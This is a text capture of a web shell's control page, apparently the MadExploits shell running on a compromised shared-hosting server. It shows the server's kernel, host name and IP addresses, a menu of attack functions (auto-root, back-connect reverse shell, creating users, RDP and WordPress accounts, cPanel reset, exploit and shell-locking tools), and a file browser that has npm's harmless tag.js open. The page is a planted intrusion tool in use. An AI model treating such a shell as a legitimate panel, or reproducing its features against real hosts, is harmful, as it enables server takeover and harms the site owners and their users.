Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.145.9.34
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
libnpmversion /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
commit.js
425
B
-rw-r--r--
enforce-clean.js
837
B
-rw-r--r--
index.js
805
B
-rw-r--r--
read-json.js
335
B
-rw-r--r--
retrieve-tag.js
384
B
-rw-r--r--
tag.js
470
B
-rw-r--r--
version.js
3.29
KB
-rw-r--r--
write-json.js
524
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag.js
const git = require('@npmcli/git') module.exports = async (version, opts) => { const { signGitTag, allowSameVersion, tagVersionPrefix, message, } = opts const tag = `${tagVersionPrefix}${version}` const flags = ['-'] if (signGitTag) { flags.push('s') } if (allowSameVersion) { flags.push('f') } flags.push('m') return git.spawn([ 'tag', flags.join(''), message.replace(/%s/g, version), tag, ], opts) }
Close